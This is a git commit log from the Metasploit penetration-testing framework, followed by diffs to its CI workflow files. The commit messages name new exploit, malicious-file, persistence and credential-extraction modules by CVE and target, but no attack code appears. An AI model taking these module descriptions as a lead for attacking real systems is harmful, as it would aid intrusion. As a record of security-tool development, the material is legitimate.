msutovsky-r7 5fd6184494 Land #20423, adds malicious XDG Desktop fileformat module
Add Malicious XDG Desktop File module
2025-08-04 11:44:02 +02:00
bcoles a7ab23d083 Add Malicious XDG Desktop File module 2025-08-04 19:23:02 +10:00
Diego Ledda da7ee9d9f8 Update modules/payloads/stages/php/meterpreter.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-08-04 11:19:57 +02:00
Chocapikk 50ef5edd90 Add Unauthenticated ICTBroadcast Remote Code Execution (CVE-2025-2611) 2025-08-02 19:46:14 +02:00
Hakil 3e47e4a08b Fixed "]}" -> "}]" 2025-08-02 14:18:28 +02:00
Spencer McIntyre 90b60c78ac Don't look up the local system SID 2025-08-01 17:37:29 -04:00
cgranleese-r7 4c94f9f94b Merge pull request #20443 from rapid7/revert-20435-adds-survey-banner-to-docs-site
Revert "Adds survey banner to the docs site"
2025-08-01 14:37:59 +01:00
adfoster-r7 8b4ea900cc Revert "Adds survey banner to the docs site" 2025-08-01 14:37:15 +01:00
msutovsky-r7 7d82ecb6b0 Land #20435, adds survey banner to the docs site
Adds survey banner to the docs site
2025-08-01 15:16:15 +02:00
jenkins-metasploit 480a81dddb automatic module_metadata_base.json update 2025-08-01 11:54:03 +00:00
Martin Sutovsky cb615899ee Updates specs 2025-08-01 13:51:25 +02:00
msutovsky-r7 63cd2cb93a Land #20437, fixes variable initialization in auxiliary/dos/http/apache_range_dos
Fixes variable initialization in auxiliary/dos/http/apache_range_dos
2025-08-01 13:45:39 +02:00
Martin Sutovsky 1c14a9756a Creates executable_path, uses that in chmod instead of path variable 2025-08-01 12:52:58 +02:00
Desiree05 8d3a35f332 Fixing issue #20436
The module did not initialize the variable uri
2025-08-01 10:48:54 +01:00
cgranleese-r7 53e2d138e8 Adds survey banner to the docs site 2025-08-01 10:31:31 +01:00
Martin Sutovsky ce1d0d1c27 Removes redundant code, unifies fail_with calling, adds advanced option for wait time 2025-08-01 10:51:52 +02:00
msutovsky-r7 8130316de9 Removes unnecessary new line
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2025-08-01 10:02:46 +02:00
Martin Sutovsky c9e0c7171b Adds cleanup method 2025-08-01 10:01:50 +02:00
Martin Sutovsky 744188fb88 Updates docs 2025-08-01 09:40:08 +02:00
Martin Sutovsky 2328b40df7 Unifies parenthesis in fail_with calling, whitespaces fixes, changing CheckCode::Unknown to CheckCode::Detected 2025-08-01 09:34:47 +02:00
adfoster-r7 569387c470 Merge pull request #20432 from cgranleese-r7/fixes-exploit-uuid-sessions-job-correlation
Fixes RPC `exploit_uuid` correlation for jobs and sessions
2025-07-31 16:59:49 +01:00
Martin Sutovsky d081d83aa6 Adds additional functionality for Pretalx 2025-07-31 14:53:49 +02:00
jenkins-metasploit 96532bd1e7 automatic module_metadata_base.json update 2025-07-31 11:09:18 +00:00
dwelch-r7 540e8b91d0 Merge pull request #20433 from msutovsky-r7/module/fix/disclosure_date
Fixes disclosure date in exploit/linux/http/pandora_fms_auth_netflow_rce.rb
2025-07-31 12:01:01 +01:00
Martin Sutovsky d2175c372f Fixes disclosure date 2025-07-31 12:58:28 +02:00
Martin Sutovsky 0d556253d3 Fix 2025-07-31 12:57:14 +02:00
cgranleese-r7 2cab34736c Fixes RPC exploit_uuid correlation for jobs and sessions 2025-07-31 09:41:32 +01:00
Metasploit e34397b8e5 Bump version of framework to 6.4.79 2025-07-31 03:33:24 -05:00
jenkins-metasploit 854a5bc01c automatic module_metadata_base.json update 2025-07-31 05:53:30 +00:00
msutovsky-r7 333b5278ac Land #20428, fixes available payload space in exploits/windows/misc/achat_bof
Fix achat_bof by increasing the available payload space
2025-07-31 07:42:32 +02:00
jacob.w.pham.mil 9013316dbd Update communication channels in documentation
- Add GitHub Discussions and Slack as primary support channels
- Update README.md with current communication options
- Update Contact.md with organized channel hierarchy
- Update CONTRIBUTING.md to include GitHub Discussions
- Maintain references to existing IRC and mailing list channels

Addresses #20234
2025-07-30 22:32:53 -04:00
jenkins-metasploit 53c3396821 automatic module_metadata_base.json update 2025-07-30 22:45:10 +00:00
Spencer McIntyre 8bbfaac13c Merge pull request #20189 from jheysel-r7/feat/mod/esc9-esc10-exploit
Add Exploit Support for ESC9, ESC10 & ESC16
2025-07-30 18:36:59 -04:00
Jack Heysel ff724d0b5c Deregister SMBUser 2025-07-30 15:28:56 -07:00
jenkins-metasploit f766f49d6a automatic module_metadata_base.json update 2025-07-30 22:11:51 +00:00
Jack Heysel de15d1e449 Minor doc update 2025-07-30 15:08:14 -07:00
Jack Heysel e88883c82b ESC9, ESC10 ESC16 exploit support 2025-07-30 15:08:14 -07:00
Spencer McIntyre 84e2e6be69 Merge pull request #20149 from jheysel-r7/esc9_esc10_cert_finder_update
ESC9, ESC10 and ESC16 detection for ldap_esc_vulnerable_cert_finder
2025-07-30 18:03:14 -04:00
h00die-gr3y 3d0cfd0dfc update module + documentation based on review comments 2025-07-30 20:24:56 +00:00
Spencer McIntyre 3fb2477fbf Increase payload space 2025-07-30 16:13:19 -04:00
Jack Heysel 13df676863 Update validate method fix failed test 2025-07-30 12:13:33 -07:00
Jack Heysel a1c95e64ba Fixed unnecesary merge conflict additions 2025-07-30 11:59:51 -07:00
Jack Heysel 8179de6cea ESC9 ESC10 and ESC16 detection 2025-07-30 11:46:57 -07:00
Martin Sutovsky 38096c6988 Adding Pretalx functionality, expanding auxiliary module 2025-07-30 15:42:34 +02:00
Hakil 1161954677 correcting a double assignment: tbl = tbl = cracker_results_table 2025-07-30 14:11:06 +02:00
Hakil 18b611f199 correcting a double assignment: tbl = tbl = cracker_results_table 2025-07-30 14:10:49 +02:00
Hakil dc787b1947 correcting a double assignment: tbl = tbl = cracker_results_table 2025-07-30 14:10:31 +02:00
Hakil e44f54fda0 correcting a double assignment: tbl = tbl = cracker_results_table 2025-07-30 14:10:03 +02:00
Hakil 2a70b78316 correcting a double assignment: tbl = tbl = cracker_results_table 2025-07-30 14:09:45 +02:00
Hakil 6ccc49523c correcting a double assignment: tbl = tbl = cracker_results_table 2025-07-30 14:09:13 +02:00
h00die-gr3y 4b52708357 update module + documentation based on review comments 2025-07-30 11:39:20 +00:00
Hakil 6c9f8ef8c9 Merge pull request #1 from msutovsky-r7/collab/feat/auto_cracker_selection
Suggests additional changes for PR
2025-07-30 11:55:14 +02:00
adfoster-r7 1361e91fa1 Merge pull request #20426 from adfoster-r7/update-multiple-dependencies
Update multiple dependencies
2025-07-30 10:28:54 +01:00
adfoster-r7 5fc5c6691e Update multiple dependencies 2025-07-30 10:11:30 +01:00
Martin Sutovsky 16a5fa2881 Fixing typos 2025-07-30 07:23:50 +02:00
Martin Sutovsky 96ba71b47f Removes incorrect comment 2025-07-30 07:11:35 +02:00
Martin Sutovsky d20494d47f Removes puts 2025-07-30 07:10:22 +02:00
gardnerapp a0d03c0638 Update modules/exploits/multi/local/periodic_script_persistence.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-07-29 13:20:20 -04:00
gardnerapp 92d246da13 Update documentation/modules/exploit/multi/local/periodic_script_persistence.md
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-07-29 13:20:00 -04:00
gardnerapp a413e78689 Update modules/exploits/multi/local/periodic_script_persistence.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-07-29 13:19:28 -04:00
gardnerapp d87787df69 Update modules/exploits/multi/local/periodic_script_persistence.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-07-29 13:18:48 -04:00
Martin Sutovsky d3f6faa99d Adjust cracker modules 2025-07-29 17:07:03 +02:00
Martin Sutovsky cf243b5d5c Adds auto option support, updates crack_database.rb accordingly 2025-07-29 15:44:48 +02:00
Hakil f454954b0a requested change resolved, PR #20418 2025-07-29 14:22:02 +02:00
Hakil 9c03306100 requested change resolved, PR #20418 2025-07-29 14:21:46 +02:00
Hakil c38cc4444f Update crack_osx.rb 2025-07-29 14:21:20 +02:00
Hakil 99ac3691f6 requested change resolved, PR #20418 2025-07-29 14:21:00 +02:00
Hakil 424e4fbd48 Update crack_databases.rb 2025-07-29 14:20:34 +02:00
Hakil 87d7decdca requested change resolved, PR #20418 2025-07-29 14:20:09 +02:00
Hakil 4b4e7cc58b requested change resolved, PR #20418 2025-07-29 14:02:30 +02:00
jenkins-metasploit 552a791e37 automatic module_metadata_base.json update 2025-07-29 10:35:15 +00:00
msutovsky-r7 cb381ad542 Land #20421, adds more reliable check in get_nonce function for auxiliary/scanner/http/wp_ultimate_member_sorting_sqli
Fix `get_nonce` in `auxiliary/scanner/http/wp_ultimate_member_sorting_sqli`
2025-07-29 12:24:05 +02:00
Simon Janusz 0a531b48c5 Merge pull request #20422 from adfoster-r7/update-jsonrpc-dependencies
Update jsonrpc dependencies
2025-07-29 11:19:37 +01:00
Valentin Lobstein 541e8d6191 Update modules/auxiliary/scanner/http/wp_ultimate_member_sorting_sqli.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-07-29 11:36:48 +02:00
adfoster-r7 77f6110842 Update jsonrpc dependencies 2025-07-29 10:17:36 +01:00
Chocapikk e095c793c7 Fix get_nonce in auxiliary/scanner/http/wp_ultimate_member_sorting_sqli 2025-07-29 07:59:06 +02:00
Metasploit c2971d5307 Bump version of framework to 6.4.78 2025-07-28 10:22:00 -05:00
jenkins-metasploit 85aca3c380 automatic module_metadata_base.json update 2025-07-28 15:07:55 +00:00
adfoster-r7 eb8e7cec27 Merge pull request #20420 from dwelch-r7/rails-7.2-upgrade
Bump rails to 7.2
2025-07-28 15:59:31 +01:00
jenkins-metasploit e40da3a887 automatic module_metadata_base.json update 2025-07-28 12:08:06 +00:00
msutovsky-r7 f4622d802e Land #20406, adds malicious Windows Script Host VBScript fileformat module
Add Malicious Windows Script Host VBScript (.vbs) File module
2025-07-28 13:58:07 +02:00
msutovsky-r7 12340ef6b5 Land #20398, adds malicious Windows Script Host JScript fileformat module
Add Malicious Windows Script Host JScript (.js) File module
2025-07-28 13:51:26 +02:00
Dean Welch 0ce1617288 Bump rails to 7.2 2025-07-28 12:29:58 +01:00
Martin Sutovsky b276c50115 Making Pretalx functionality more robust 2025-07-28 10:53:24 +02:00
h00die dcde8d1580 adjust spaces and review comments for persistence lib 2025-07-27 19:07:39 -04:00
h00die 4ec8a0e356 fix linux user spec 2025-07-27 18:50:23 -04:00
adfoster-r7 5162a8d3b3 Merge pull request #20417 from fishBone000/typo
fix: Fix typo in reflective_pe_loader.rb
2025-07-27 18:02:04 +01:00
Martin Sutovsky d26589796a Updates docs, code refactor 2025-07-27 12:42:11 +02:00
Hakil ecfdec9678 Fix issue #20396 2025-07-26 18:36:14 +02:00
Hakil d48419160b Fix issue #20396 2025-07-26 18:35:47 +02:00
Hakil 06c17a6e77 Update crack_webapps.rb 2025-07-26 18:35:21 +02:00
Hakil d88c4bde88 Fix issue #20396 2025-07-26 18:34:54 +02:00
Hakil 5aee8d5d42 Fix issue #20396 2025-07-26 18:34:12 +02:00
Hakil bd3ce5f20e Fix issue #20396 2025-07-26 18:33:20 +02:00
Hakil 56f138c4a1 Fix issue #20396 2025-07-26 18:31:43 +02:00
Hakil 7450d728c1 Fix issue #20396 2025-07-26 18:26:29 +02:00
fishBone000 64905f866e fix: Fix typo in reflective_pe_loader.rb
Fix strange typo that makes the file non-ASCII
2025-07-26 15:55:03 +00:00
Vognik 8024900171 fix tests 2025-07-26 03:15:00 +04:00
Martin Sutovsky 4844a29a1f Documentation base 2025-07-25 20:19:47 +02:00
Martin Sutovsky 1a668a8964 Adding checks 2025-07-25 16:57:11 +02:00
sfewer-r7 3237151512 add in the documentation 2025-07-25 14:40:12 +01:00
Martin Sutovsky fa41ed5876 Code refactoring 2025-07-25 15:33:29 +02:00
Martin Sutovsky edfa84ed42 Uses Rex::MIME::Message instead of manual form-data 2025-07-25 14:24:42 +02:00
sfewer-r7 228a066521 add a reference to the Kaspersky analysis which covers all 4 CVEs 2025-07-25 12:26:55 +01:00
Martin Sutovsky 73aa43e069 Adds Rex::MIME::Message instead of manual form-data generating 2025-07-25 13:02:44 +02:00
sfewer-r7 36fff14466 fix a comment typo 2025-07-25 11:04:18 +01:00
sfewer-r7 f16f7bf2ad add in reference to teh LeakIX blog, which shows CVE-2025-53771 2025-07-25 11:02:55 +01:00
sfewer-r7 ae95d3d4e8 add a comment to clarify what CVE-2025-53771 is 2025-07-25 11:02:08 +01:00
sfewer-r7 8df7f64e79 add some comments to clarify what CVE-2025-49704 is 2025-07-25 11:01:41 +01:00
sfewer-r7 6d9d9a70d4 add some comments to clarify what CVE-2025-49706 is 2025-07-25 11:01:22 +01:00
jenkins-metasploit 86d5d52838 automatic module_metadata_base.json update 2025-07-25 08:55:33 +00:00
msutovsky-r7 1fb76b1776 Land #20408, fixes arguments passing to redis_command function in auxiliary/scanner/redis/redis_server
Fix modules\auxiliary\scanner\redis\redis_server
2025-07-25 10:47:14 +02:00
bcoles cbc03eaeeb Add Malicious Windows Script Host VBScript (.vbs) File module 2025-07-25 18:46:47 +10:00
bcoles 44c61a7e4d Add Malicious Windows Script Host JScript (.js) File module 2025-07-25 18:43:33 +10:00
Maksim Rogov 9696cc57db Merge branch 'rapid7:master' into CVE-2025-34300 2025-07-25 11:02:03 +04:00
Vognik 82eadede83 Code Review Edits from @sjanusz-r7 2025-07-25 05:17:48 +04:00
jenkins-metasploit fcff88b644 automatic module_metadata_base.json update 2025-07-24 21:58:39 +00:00
jheysel-r7 392f87dee2 Merge pull request #20401 from zeroSteiner/feat/mod/ldap/gmsa-secrets
Add gMSA Secret Extraction From LDAP
2025-07-24 14:50:24 -07:00
Metasploit 679c74f145 Bump version of framework to 6.4.77 2025-07-24 09:38:58 -05:00
laptop e4686fe129 deleted the spaces in EOF 2025-07-24 19:23:44 +08:00
sfewer-r7 a81710486e add in a reference to the new technical analysis from the origional finder 2025-07-24 12:15:24 +01:00
Martin Sutovsky 54c86cfc10 Addressing comments 2025-07-24 12:19:47 +02:00
Maksim Rogov 6e5d474b21 Apply suggestion from @jheysel-r7 in Docs
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2025-07-24 06:23:01 +03:00
Vognik 38b0bd15e1 Code Review Edits 2025-07-24 07:19:25 +04:00
Stephen Fewer 899e275155 Make the double quotes optional, reports of Server 2016 not using these, but Server 2019 is. Thanks @w0rk3r for the bug report and fix.
Co-authored-by: Jonhnathan <26856693+w0rk3r@users.noreply.github.com>
2025-07-23 23:51:42 +01:00
sfewer-r7 b8cf458706 the check routine was getting the /_layouts/15/error.aspx page, this will not be accessable unless Forms Based Authentication (FBA) is enabled on the site. A better choice is /_layouts/15/start.aspx as this is accessible regardless of FBA being enabled. Thanks @alexey-at-work-bc for identifying this and sugesting a fix. 2025-07-23 23:03:43 +01:00
sfewer-r7 7838e06f4f reimplement the gadget chain using the Metasploit Msf::Util::DotNetDeserialization routines 2025-07-23 17:36:56 +01:00
bwatters-r7 dcfa448cf8 Remove now unused timeout 2025-07-23 10:40:24 -05:00
bwatters-r7 07692ff241 Remove errant write_log call and swap to the all-in-one psh_exec rather than execute_script 2025-07-23 09:40:35 -05:00
sfewer-r7 d2a1f7bae9 add in exploit for CVE-2025-53770 and CVE-2025-53771, Microsoft SharePoint Server ToolPane Unauthenticated Remote Code Execution (aka ToolShell) 2025-07-23 12:40:14 +01:00
Vognik e93755adc6 Added WritableDir Option 2025-07-23 11:59:48 +04:00
laptop 9c1b7e94eb –fix(redis_server): Correctly parse multi-word Redis commands 2025-07-23 11:50:34 +08:00
Martin Sutovsky 75f6e6a748 Refactors code, adds description, fixes CVE 2025-07-22 16:24:35 +02:00
Martin Sutovsky 4708a25dfa Module init 2025-07-22 11:11:19 +02:00
Vognik d62ef448f1 Code Review Edits 2025-07-22 04:40:14 +04:00
Vognik 1c1b574b81 Removed Debug Print 2025-07-21 21:37:52 +04:00
Vognik d57a36413d Fix Tests 2025-07-21 21:34:41 +04:00
Vognik 6276b27dfc Improved Exploit Stability on Windows 2025-07-21 21:34:01 +04:00
Martin Sutovsky ed5c13330f Module init 2025-07-21 12:41:38 +02:00
Maksim Rogov 85e97aaaf5 Fix STUDYNAME empty check 2025-07-21 13:14:19 +03:00
Vognik e90396a15f Execute Method Refactoring 2025-07-21 13:59:43 +04:00
Vognik c06a7c477b Check Method Refactoring 2025-07-21 13:06:51 +04:00
Vognik 45a6176a9c Removed Limits 2025-07-21 11:03:24 +04:00
Vognik 6bf385e17a Removed dublicate logging bug 2025-07-21 03:20:34 +04:00
Vognik a836c9bc5e Fixed CVE Format 2025-07-21 03:17:57 +04:00
Vognik 75e1158457 Fixed docs formatting 2025-07-21 03:16:40 +04:00
h00die-gr3y 58704e9eab init module + documentation 2025-07-20 19:06:01 +00:00
Vognik e7667d406a Add Lighthouse Studio unauthenticated RCE (CVE-2025-34300) 2025-07-20 15:23:38 +04:00
Valentin Lobstein e42af1843b Lint 2025-07-19 03:22:12 +01:00
Valentin Lobstein 2bb2bbc5bd Update wp_depicter_sqli_cve_2025_2011.rb 2025-07-19 04:07:22 +02:00
Spencer McIntyre 54c5cdaf61 Update the acceptance tests 2025-07-18 17:29:35 -04:00
Spencer McIntyre 714f667c0f Finish adding gMSA secret dumping 2025-07-18 17:10:35 -04:00
Spencer McIntyre 68a3f5624c Define empty NT and LM hash constants 2025-07-18 16:50:54 -04:00
Spencer McIntyre 8928362581 Support formatting passwords without the database 2025-07-18 16:50:33 -04:00
Spencer McIntyre 82610aec24 Initial commit of extracting gMSA secrets from LDAP 2025-07-18 10:59:15 -04:00
h00die-gr3y abbcdda694 update based on adfoster-r7 comments 2025-07-18 07:22:01 +00:00
Umut 708dcaf36e Delete unnecessary comments 2025-07-17 15:28:20 +03:00
Umut 90d15cbe61 finalize the payload
add CachedSize & fix the fifth arg problem & run rubocop
2025-07-17 11:39:44 +03:00
Chocapikk ac62c42be8 chore(wp_depicter): remove unused Actions block 2025-07-16 22:20:31 +02:00
h00die-gr3y 7a9cd79170 small update on the documentation 2025-07-16 09:32:47 +00:00
h00die-gr3y 639315452c added attackerkb reference + documenttaion 2025-07-16 09:29:14 +00:00
Umut 0344591863 fix 5th arg for URLDownloadToFileA 2025-07-16 11:35:35 +03:00
h00die 71d0d037b5 add spec for linux user lib 2025-07-15 20:38:32 +00:00
h00die 83a6e82603 Update lib/msf/core/post/linux/user.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-07-15 16:29:22 -04:00
h00die-gr3y f6e0c43ed9 init module 2025-07-15 19:06:00 +00:00
Umut a412070a12 Create download_exec.rb 2025-07-15 16:50:59 +03:00
Chocapikk c45481fa58 fix: guard get_sqli_object JSON extraction to avoid NoMethodError 2025-07-12 15:12:02 +02:00
Chocapikk 9aef758c31 fix: abort run when get_sqli_object returns error constant 2025-07-12 15:09:05 +02:00
Chocapikk 869ed8d818 fix: replace return with next in get_sqli_object to prevent LocalJumpError 2025-07-12 15:00:57 +02:00
h00die f9a804d649 persistence libraries 2025-07-11 17:35:06 -04:00
Corey 0f7aafa48e Add session platform, apply Rubocop changes 2025-07-10 14:09:44 -04:00
Corey 0f0ca54e6c Remove get_python method 2025-07-10 11:57:06 -04:00
Corey 2351a6a9bc Minor changes to options, add documentation 2025-07-08 13:30:22 -04:00
Corey 8a8e3a3047 Rubocop changes 2025-07-08 13:01:09 -04:00
Corey c9d41be766 Add authors, print cleanup, rename vars 2025-07-08 13:00:15 -04:00
gardnerapp d694c27119 Update modules/exploits/multi/local/periodic_script_persistence.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-07-08 10:54:08 -04:00
gardnerapp d2c7ac8d51 Update modules/exploits/multi/local/periodic_script_persistence.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-07-08 10:53:47 -04:00
gardnerapp 52acc15a51 Update modules/exploits/multi/local/periodic_script_persistence.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-07-08 10:53:28 -04:00
gardnerapp b3e16e9c47 Update modules/exploits/multi/local/periodic_script_persistence.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-07-08 10:52:58 -04:00
Martin Sutovsky 5f1ff38293 Adds check for version negotiation response 2025-07-08 07:27:32 +02:00
Isaac 1db87f1501 fix-issue-19384
Resolve issue 19384 where msfvenom was unable to be run outside of the metasploit working directory.
2025-07-04 14:02:20 -04:00
Corey e465720a3c Rubocop changes 2025-07-01 14:36:20 -04:00
Corey a66d60bf76 Move module to multi, add get_python method 2025-07-01 14:34:51 -04:00
Corey a5e30153e8 Add default arch_cmd target 2025-06-06 12:06:17 -04:00
dledda-r7 5e3e975b7d fix: renaming Osx to OSX for autoload support 2025-06-02 09:22:46 -04:00
dledda-r7 c4ca4d6999 fix: re-include OSX specific option 2025-06-02 08:14:59 -04:00
dledda-r7 70bafdfcd8 fix: delete of meterpreter_options.rb 2025-06-02 08:07:14 -04:00
dledda-r7 e4bc2a6528 fix: changed MeterpreterOptions to be platform-specific in pivot 2025-06-02 08:07:14 -04:00
dledda-r7 dd23be9695 fix: modified meterpreter_reverse template for platform-specific MeterpreterOptions 2025-06-02 08:07:13 -04:00
dledda-r7 e44043b88a fix: restored deleted comments 2025-06-02 08:07:13 -04:00
dledda-r7 a7f4da5431 feat: split platform-specific meterpreter options on different modules, adding AutoLoadExtensions option (AppleIos,Php,Python,Java,Osx,Android) 2025-06-02 08:07:06 -04:00
dledda-r7 44617cbe37 feat: split platform-specific meterpreter options on different modules, adding AutoLoadExtensions option (Windows, Linux) 2025-06-02 08:06:05 -04:00
Corey aa99015403 Rubocop and review changes 2025-04-22 13:36:59 -04:00
Corey f991843b81 Remove file from accidental commit 2025-04-20 15:56:01 -04:00
Corey c08790c837 add module 2025-04-20 15:53:59 -04:00
Corey e61b83912c Fix initialize, add cleanup script, make perioidc script executable 2025-04-20 15:53:59 -04:00
Corey 3fee2b6684 Add writing payload and periodic script 2025-04-20 15:53:59 -04:00
Corey d5556efab3 Start basic module scaffold 2025-04-20 15:53:59 -04:00
dledda-r7 98f0183805 fix(sources): fixed poolparty stub to graceful exit after callback 2024-09-25 08:10:53 -04:00
dledda-r7 3a4b5eb372 feat(sources): including shellcodes used during pool-party injection 2024-09-25 05:14:58 -04:00
3614 changed files with 161426 additions and 37968 deletions
+3
View File
@@ -0,0 +1,3 @@
# Copilot Instructions
Refer to [AGENTS.md](../AGENTS.md) in the repository root for all project conventions, coding standards, and AI agent guidelines.
+19
View File
@@ -0,0 +1,19 @@
name: Add pull request to the kanban board
on:
pull_request_target:
types:
- opened
- reopened
jobs:
add-to-project:
name: Add pull request to the kanban board
runs-on: ubuntu-latest
steps:
- uses: actions/add-to-project@v1.0.2
with:
project-url: https://github.com/orgs/rapid7/projects/17
# smcintyre/GITHUB_PROJECT_TOKEN (PAT), Expires on Wed, Jan 27 2027
github-token: ${{ secrets.GH_PROJECT_TOKEN }}
+1 -1
View File
@@ -38,7 +38,7 @@ jobs:
fail-fast: true
matrix:
ruby:
- '3.0'
- '3.3'
name: Ruby ${{ matrix.ruby }}
steps:
+68
View File
@@ -0,0 +1,68 @@
name: Extended Tests
# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
permissions:
actions: none
checks: none
contents: none
deployments: none
id-token: none
issues: none
discussions: none
packages: none
pages: none
# This action can update/close pull requests
pull-requests: write
repository-projects: none
security-events: none
statuses: none
on:
pull_request_target:
branches:
- '*'
paths:
- '**/**ldap**'
- '**/**kerberos**'
- '**/**gss**'
jobs:
add-labels:
runs-on: ubuntu-latest
steps:
- uses: actions/github-script@v6
with:
github-token: ${{secrets.GITHUB_TOKEN}}
script: |
// NOTE: The following section is JavaScript. Note that backticks will need to be escaped within
// the multiline comment strings in the following config. When editing this file, using JavaScript
// syntax highlighting might be easier.
//
// This script has intentionally been inlined instead of using third-party Github actions for both
// security and performance reasons.
const currentLabelNames = context.payload.pull_request.labels.map(label => label.name);
const newLabelName = "additional-testing-required";
const comment = `
Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.
We've added the \`${newLabelName}\` label to indicate that additional testing is required before this pull request can be merged.
For maintainers, this means visiting [here](https://jenkins-metasploit.build.r7ops.com/job/pro_manual_test_trigger/).
`;
if (!currentLabelNames.includes(newLabelName)) {
await github.rest.issues.addLabels({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
labels: [newLabelName]
});
const precedingWhitespaceLength = comment.split("\n")[1].search(/\S/);
const commentWithoutPrecedingWhitespace = comment.split("\n").map(line => line.substring(precedingWhitespaceLength)).join("\n").trim();
await github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: commentWithoutPrecedingWhitespace
});
}
+4
View File
@@ -62,3 +62,7 @@ jobs:
ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
ls -la ./.git/hooks
./.git/hooks/post-merge
- name: Verify encoding
run: |
bundle exec ruby tools/dev/verify_encoding.rb
@@ -44,6 +44,7 @@ on:
- 'Gemfile.lock'
- 'data/templates/**'
- 'modules/payloads/**'
- 'lib/msf/base/sessions/**'
- 'lib/msf/core/payload/**'
- 'lib/msf/core/**'
- 'test/modules/**'
+1 -1
View File
@@ -31,7 +31,7 @@ jobs:
- ubuntu-latest
- windows-2022
- windows-2025
- macos-13
- macos-15-intel
env:
RAILS_ENV: test
+31 -5
View File
@@ -12,9 +12,37 @@ on:
required: false
default: "[]"
type: string
additional_rails_versions:
description: 'Additional Rails version requirements as a JSON array (for example: ["~> 8.1.0"])'
required: false
default: "[]"
type: string
# Caller example:
# with:
# additional_rails_versions: '["~> 8.1.0", "~> 8.2.0"]'
jobs:
prepare_matrix:
runs-on: ubuntu-latest
outputs:
rails_versions: ${{ steps.merge_rails_versions.outputs.rails_versions }}
steps:
- name: Build Rails version matrix
id: merge_rails_versions
run: |
default_rails_versions='["~> 7.0.0","~> 7.1.0","~> 7.2.0"]'
additional_rails_versions='${{ inputs.additional_rails_versions }}'
rails_versions=$(jq -cn \
--argjson defaults "$default_rails_versions" \
--argjson extras "$additional_rails_versions" \
'$defaults + $extras | unique')
echo "rails_versions=$rails_versions" >> "$GITHUB_OUTPUT"
shell: bash
test:
needs: prepare_matrix
runs-on: ${{ matrix.os }}
timeout-minutes: 40
@@ -25,18 +53,16 @@ jobs:
- '3.2'
- '3.3'
- '3.4'
rails:
- '~> 7.0.0'
- '~> 7.1.0'
- '~> 7.2.0'
rails: ${{ fromJSON(needs.prepare_matrix.outputs.rails_versions) }}
postgres:
- '9.6'
- '14.19'
- '16.8'
os:
- ubuntu-latest
env:
RAILS_ENV: test
RAILS_VERSION: ${{ matrix.rails }}
name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - Rails ${{ matrix.rails }} - PostgreSQL ${{ matrix.postgres }}
steps:
@@ -67,7 +67,7 @@ jobs:
fail-fast: false
matrix:
os:
- macos-13
- macos-15-intel
- windows-2022
- ubuntu-latest
ruby:
@@ -92,7 +92,7 @@ jobs:
# - { meterpreter: { name: windows_meterpreter }, ruby: '3.4', os: windows-2025 }
# Mettle
- { meterpreter: { name: mettle }, os: macos-13 }
- { meterpreter: { name: mettle }, os: macos-15-intel }
- { meterpreter: { name: mettle }, os: ubuntu-latest }
runs-on: ${{ matrix.os }}
@@ -112,8 +112,18 @@ jobs:
if: runner.os == 'Linux'
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
- uses: shivammathur/setup-php@c541c155eee45413f5b09a52248675b1a2575231
if: ${{ matrix.meterpreter.name == 'php' }}
# Use setup-php@2.31.1 for Windows (PHP 5.3 on windows-2022 is broken with later versions while PHP 7.4 and 8.3
# are broken on MacOS with this version)
- name: Use setup-php@2.31.1 to install PHP for Windows runners
uses: shivammathur/setup-php@c541c155eee45413f5b09a52248675b1a2575231
if: ${{ matrix.meterpreter.name == 'php' && runner.os == 'Windows' }}
with:
php-version: ${{ matrix.meterpreter.runtime_version }}
tools: none
- name: Use setup-php@2.37.0 to install PHP for non-Windows runners
uses: shivammathur/setup-php@accd6127cb78bee3e8082180cb391013d204ef9f
if: ${{ matrix.meterpreter.name == 'php' && runner.os != 'Windows' }}
with:
php-version: ${{ matrix.meterpreter.runtime_version }}
tools: none
@@ -192,7 +202,7 @@ jobs:
ref: ${{ inputs.metasploit_framework_commit }}
# https://github.com/orgs/community/discussions/26952
- name: Support longpaths
- name: Support longpaths when running on Windows
if: runner.os == 'Windows'
run: git config --system core.longpaths true
@@ -269,12 +279,26 @@ jobs:
working-directory: metasploit-payloads
- name: Build Windows payloads via Visual Studio 2022 Build (Windows)
shell: cmd
shell: pwsh
if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2022' && inputs.build_metasploit_payloads }}
run: |
cd c/meterpreter
git submodule init && git submodule update
make.bat
Set-Location "C:\Program Files (x86)\Microsoft Visual Studio\Installer\"
dir
# $InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
# $WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
# $Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
# $process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
# if ($process.ExitCode -eq 0) {
# Write-Host "components have been successfully added"
# } else {
# Write-Host "components were not installed"
# exit 1
# }
# Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
